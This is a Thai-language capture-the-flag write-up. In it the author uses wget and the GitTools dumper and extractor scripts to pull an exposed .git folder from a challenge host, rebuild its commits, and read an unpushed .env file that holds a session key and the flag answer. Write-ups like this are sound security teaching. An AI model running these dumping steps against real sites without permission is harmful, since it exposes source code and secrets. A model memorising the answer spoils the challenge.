Logo
Scenario 3 Part 2 - Data Leakage (2)

Scenario 3 Part 2 - Data Leakage (2)

Mr. Wan Mr. Wan
December 13, 2025
3 min read
CTF

image-1

โจทย์นี้จะให้เราหา Commit ที่ยังไม่ได้ถูก Push ขึ้น GitHub ดังนั้นเราจำเป็นต้องดึง .git folder ลงมา

งั้นไปใช้คำสั่งจากโจทย์ TORNADO SIREN กัน!

mrwan2546@Mrs-MacBook-Pro % wget --mirror -I .git https://discord.system-login.co/.git/
--2025-12-13 18:21:48--  https://discord.system-login.co/.git/
Resolving discord.system-login.co (discord.system-login.co)... 104.21.50.94, 172.67.159.236
Connecting to discord.system-login.co (discord.system-login.co)|104.21.50.94|:443... connected.
HTTP request sent, awaiting response... 404 Not Found
2025-12-13 18:21:48 ERROR 404: Not Found.

อะอ่าว ไหง๋ไม่ได้ซะงั้น ;w; เอายังไงดีเนี่ยยยย

ก็เลยลองไปค้นหาดูว่าต้องดึงยังไงให้สามารถดึงได้โดยที่ไม่ต้องให้ Index ช่วย ปรากฏไปเจอบทความนี้ https://0x0elliot.medium.com/git-good-a-web-ctf-dealing-with-broken-git-commits-f879163557f9

ทำให้ได้รู้ว่า เราสามารถดึงข้อมูล .git ทีละ file ได้ แต่ขั้นตอนจะซับซ้อนหน่อย แต่ได้ ข้อมูลแน่นอน!

งั้นลองติดตั้งแล้วลองดูกัน!

mrwan2546@Mrs-MacBook-Pro Dumper % ./gitdumper.sh https://discord.system-login.co/.git/ ./test
###########
# GitDumper is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances.
# Only for educational purposes!
###########




[*] Destination folder does not exist
[+] Creating ./test/.git/
[+] Downloaded: HEAD
[-] Downloaded: objects/info/packs
[+] Downloaded: description
[+] Downloaded: config
[+] Downloaded: COMMIT_EDITMSG
[+] Downloaded: index
[-] Downloaded: packed-refs
[-] Downloaded: refs/heads/master
[-] Downloaded: refs/remotes/origin/HEAD
[-] Downloaded: refs/stash
[+] Downloaded: logs/HEAD
[-] Downloaded: logs/refs/heads/master
[-] Downloaded: logs/refs/remotes/origin/HEAD
[-] Downloaded: info/refs
[+] Downloaded: info/exclude
[-] Downloaded: /refs/wip/index/refs/heads/master
[-] Downloaded: /refs/wip/wtree/refs/heads/master
[-] Downloaded: objects/00/00000000000000000000000000000000000000
[+] Downloaded: objects/1c/db5a2424761d11737c4fa351c1e5547e219f06
[+] Downloaded: objects/e1/a5d1021960c80188aeb9cb55aa681ff5db6d96
[+] Downloaded: objects/2f/c3317a580d06d49ce2f30bd786a8b015dd35aa
[+] Downloaded: objects/97/15197782d84a59ed497f5fd20753d66781bf2c
[+] Downloaded: objects/bf/466666b6f903abf832248c77d34271eee29b86
[+] Downloaded: objects/d2/6205005e1fa3814ee59b30ab8bd4cc8085933c
[+] Downloaded: objects/a7/a4125453e96795f61a291271426aa547477583
[+] Downloaded: objects/a8/b1d54fd681dd8f99c98f24585463dfe0f5ec03
[+] Downloaded: objects/e0/573e332b34246526efa7daea8a5a710af9aa3f
[+] Downloaded: objects/33/7c8705b3115ba6258aa2bf7e8610954cd68164
[+] Downloaded: objects/33/ab965c808bd7366fda6056e3d5099bd8dd7d59
[+] Downloaded: objects/a3/a6e5455f8d11f1c46671360f6f489442e8f66d
[+] Downloaded: objects/42/667930deea802a232fb63332d5947f28565b62
[+] Downloaded: objects/27/709468c22bbc0ff5a79615a7ddfe3c8d0579db
[+] Downloaded: objects/14/38fccd25b24a90e4ae03ede4d677aaf0cea5bc
[+] Downloaded: objects/c0/c2232fd4b24d416af851b6b17dfb3cf0f20f12
[+] Downloaded: objects/44/c67cf5b57d4d2cd2853f882a077c70731f9dfe
[+] Downloaded: objects/fa/3feef5d5cec0b5e68eaf35cb07a2ed91bf9299
[+] Downloaded: objects/64/5ec9c2dc9cc9a58c9830b54e59d67c03dd05e0
[+] Downloaded: objects/0d/c93eddfc5c1c89f2f263b6264440e82cc493f2
[+] Downloaded: objects/9f/2b656e6b011ea26d0db1de93f8a1a751fbd298
[+] Downloaded: objects/05/e5e00c3ce010e6a3a53925502a51c5ddf6979c
[+] Downloaded: objects/19/524efd1dd44c416e0c705a37ee01503ea6c97f
[-] Downloaded: objects/b8/c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7
[-] Downloaded: objects/9a/8b7c6d5e4f3a2b1c0d9e8f7a6b5c4d3e2f1a0b
mrwan2546@Mrs-MacBook-Pro Dumper % ls
README.md  gitdumper.sh  test
mrwan2546@Mrs-MacBook-Pro Dumper % cd test
mrwan2546@Mrs-MacBook-Pro test % git status
On branch main


No commits yet


Changes to be committed:
  (use "git rm --cached <file>..." to unstage)
  new file:   .env_ed6310b0a1cccd82d36d1aa73f3dae34
  new file:   README.md
  new file:   discord.png
  new file:   index.html


Changes not staged for commit:
  (use "git add/rm <file>..." to update what will be committed)
  (use "git restore <file>..." to discard changes in working directory)
  deleted:    .env_ed6310b0a1cccd82d36d1aa73f3dae34
  deleted:    README.md
  deleted:    discord.png
  deleted:    index.html


mrwan2546@Mrs-MacBook-Pro %

เย้ย! ได้จริงด้วย OwO! แล้วพอเช็คก็เจอ .env_ed6310b0a1cccd82d36d1aa73f3dae34 ที่ยังไม่ได้ถูก push commit ซะด้วย งั้นต่อไปเราไปดึงประวัติการแก้ไขกัน!

โดยจะใช้ Extractor ในการแกะข้อมูลประวัติแต่ละ Commit ออกมาทั้งหมด

mrwan2546@Mrs-MacBook-Pro Extractor % ./extractor.sh ../Dumper/test ./
###########
# Extractor is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances.
# Only for educational purposes!
###########
\e[32m[+] Found commit: 2fc3317a580d06d49ce2f30bd786a8b015dd35aa\e[0m
\e[32m[+] Found file: /Users/mrwan2546/Downloads/gitTools-v0.0.1/Extractor/.//0-2fc3317a580d06d49ce2f30bd786a8b015dd35aa/.env\e[0m
\e[32m[+] Found file: /Users/mrwan2546/Downloads/gitTools-v0.0.1/Extractor/.//0-2fc3317a580d06d49ce2f30bd786a8b015dd35aa/README.md\e[0m
\e[32m[+] Found file: /Users/mrwan2546/Downloads/gitTools-v0.0.1/Extractor/.//0-2fc3317a580d06d49ce2f30bd786a8b015dd35aa/discord.png\e[0m
\e[32m[+] Found file: /Users/mrwan2546/Downloads/gitTools-v0.0.1/Extractor/.//0-2fc3317a580d06d49ce2f30bd786a8b015dd35aa/index.html\e[0m
\e[32m[+] Found commit: 9715197782d84a59ed497f5fd20753d66781bf2c\e[0m
\e[32m[+] Found file: /Users/mrwan2546/Downloads/gitTools-v0.0.1/Extractor/.//1-9715197782d84a59ed497f5fd20753d66781bf2c/.env\e[0m
\e[32m[+] Found file: /Users/mrwan2546/Downloads/gitTools-v0.0.1/Extractor/.//1-9715197782d84a59ed497f5fd20753d66781bf2c/README.md\e[0m
\e[32m[+] Found file: /Users/mrwan2546/Downloads/gitTools-v0.0.1/Extractor/.//1-9715197782d84a59ed497f5fd20753d66781bf2c/discord.png\e[0m
\e[32m[+] Found file: /Users/mrwan2546/Downloads/gitTools-v0.0.1/Extractor/.//1-9715197782d84a59ed497f5fd20753d66781bf2c/index.html\e[0m
\e[32m[+] Found commit: bf466666b6f903abf832248c77d34271eee29b86\e[0m
\e[32m[+] Found file: /Users/mrwan2546/Downloads/gitTools-v0.0.1/Extractor/.//2-bf466666b6f903abf832248c77d34271eee29b86/README.md\e[0m
\e[32m[+] Found file: /Users/mrwan2546/Downloads/gitTools-v0.0.1/Extractor/.//2-bf466666b6f903abf832248c77d34271eee29b86/discord.png\e[0m
\e[32m[+] Found file: /Users/mrwan2546/Downloads/gitTools-v0.0.1/Extractor/.//2-bf466666b6f903abf832248c77d34271eee29b86/index.html\e[0m
\e[32m[+] Found commit: a7a4125453e96795f61a291271426aa547477583\e[0m
\e[32m[+] Found file: /Users/mrwan2546/Downloads/gitTools-v0.0.1/Extractor/.//3-a7a4125453e96795f61a291271426aa547477583/README.md\e[0m
\e[32m[+] Found file: /Users/mrwan2546/Downloads/gitTools-v0.0.1/Extractor/.//3-a7a4125453e96795f61a291271426aa547477583/discord.png\e[0m
\e[32m[+] Found file: /Users/mrwan2546/Downloads/gitTools-v0.0.1/Extractor/.//3-a7a4125453e96795f61a291271426aa547477583/index.html\e[0m
\e[32m[+] Found commit: d26205005e1fa3814ee59b30ab8bd4cc8085933c\e[0m
\e[32m[+] Found file: /Users/mrwan2546/Downloads/gitTools-v0.0.1/Extractor/.//4-d26205005e1fa3814ee59b30ab8bd4cc8085933c/.env\e[0m
\e[32m[+] Found file: /Users/mrwan2546/Downloads/gitTools-v0.0.1/Extractor/.//4-d26205005e1fa3814ee59b30ab8bd4cc8085933c/README.md\e[0m
\e[32m[+] Found file: /Users/mrwan2546/Downloads/gitTools-v0.0.1/Extractor/.//4-d26205005e1fa3814ee59b30ab8bd4cc8085933c/discord.png\e[0m
\e[32m[+] Found file: /Users/mrwan2546/Downloads/gitTools-v0.0.1/Extractor/.//4-d26205005e1fa3814ee59b30ab8bd4cc8085933c/index.html\e[0m
\e[32m[+] Found commit: a8b1d54fd681dd8f99c98f24585463dfe0f5ec03\e[0m
\e[32m[+] Found file: /Users/mrwan2546/Downloads/gitTools-v0.0.1/Extractor/.//5-a8b1d54fd681dd8f99c98f24585463dfe0f5ec03/.env_ed6310b0a1cccd82d36d1aa73f3dae34\e[0m
\e[32m[+] Found file: /Users/mrwan2546/Downloads/gitTools-v0.0.1/Extractor/.//5-a8b1d54fd681dd8f99c98f24585463dfe0f5ec03/README.md\e[0m
\e[32m[+] Found file: /Users/mrwan2546/Downloads/gitTools-v0.0.1/Extractor/.//5-a8b1d54fd681dd8f99c98f24585463dfe0f5ec03/discord.png\e[0m
\e[32m[+] Found file: /Users/mrwan2546/Downloads/gitTools-v0.0.1/Extractor/.//5-a8b1d54fd681dd8f99c98f24585463dfe0f5ec03/index.html\e[0m
\e[32m[+] Found commit: e1a5d1021960c80188aeb9cb55aa681ff5db6d96\e[0m
\e[32m[+] Found file: /Users/mrwan2546/Downloads/gitTools-v0.0.1/Extractor/.//6-e1a5d1021960c80188aeb9cb55aa681ff5db6d96/.env\e[0m
\e[32m[+] Found file: /Users/mrwan2546/Downloads/gitTools-v0.0.1/Extractor/.//6-e1a5d1021960c80188aeb9cb55aa681ff5db6d96/README.md\e[0m
\e[32m[+] Found file: /Users/mrwan2546/Downloads/gitTools-v0.0.1/Extractor/.//6-e1a5d1021960c80188aeb9cb55aa681ff5db6d96/discord.png\e[0m
\e[32m[+] Found file: /Users/mrwan2546/Downloads/gitTools-v0.0.1/Extractor/.//6-e1a5d1021960c80188aeb9cb55aa681ff5db6d96/index.html\e[0m
\e[32m[+] Found commit: 1cdb5a2424761d11737c4fa351c1e5547e219f06\e[0m
\e[32m[+] Found file: /Users/mrwan2546/Downloads/gitTools-v0.0.1/Extractor/.//7-1cdb5a2424761d11737c4fa351c1e5547e219f06/README.md\e[0m
mrwan2546@Mrs-MacBook-Pro Extractor % ls
0-2fc3317a580d06d49ce2f30bd786a8b015dd35aa  5-a8b1d54fd681dd8f99c98f24585463dfe0f5ec03
1-9715197782d84a59ed497f5fd20753d66781bf2c  6-e1a5d1021960c80188aeb9cb55aa681ff5db6d96
2-bf466666b6f903abf832248c77d34271eee29b86  7-1cdb5a2424761d11737c4fa351c1e5547e219f06
3-a7a4125453e96795f61a291271426aa547477583  README.md
4-d26205005e1fa3814ee59b30ab8bd4cc8085933c  extractor.sh
mrwan2546@Mrs-MacBook-Pro Extractor %

อ่าห้า! เจอแล้ว! แล้ว… Folder ไหนละนะเนี่ยยยย แต่เอ๊ะลองกลับไปดูตอนพิมพ์ git status ดู

Changes to be committed:
  (use "git rm --cached <file>..." to unstage)
  new file:   .env_ed6310b0a1cccd82d36d1aa73f3dae34 <-
  new file:   README.md
  new file:   discord.png
  new file:   index.html

ชื่อ File อาจเป็นชื่อ commit นั้นก็ได้ ก็เลยลองค้น ๆ ดูก็ใช่จริงด้วย เป็น commit ที่กำลังเตรียม push ขึ้น GitHub

งั้นไปเปิด File สิ! รออะไรละ!

mrwan2546@Mrs-MacBook-Pro Extractor % cd 5-a8b1d54fd681dd8f99c98f24585463dfe0f5ec03
mrwan2546@Mrs-MacBook-Pro 5-a8b1d54fd681dd8f99c98f24585463dfe0f5ec03 % ls
README.md  commit-meta.txt  discord.png  index.html
mrwan2546@Mrs-MacBook-Pro 5-a8b1d54fd681dd8f99c98f24585463dfe0f5ec03 % cat .env_ed6310b0a1cccd82d36d1aa73f3dae34
VHOST=
PASETO_SESSION_KEY=73457323255543373325273242734729
FLAG_17=STH{ed6310b0a1cccd82d36d1aa73f3dae34}%  <- จะเอ๊

คำตอบอยู่นี่เอง!

STH{ed6310b0a1cccd82d36d1aa73f3dae34}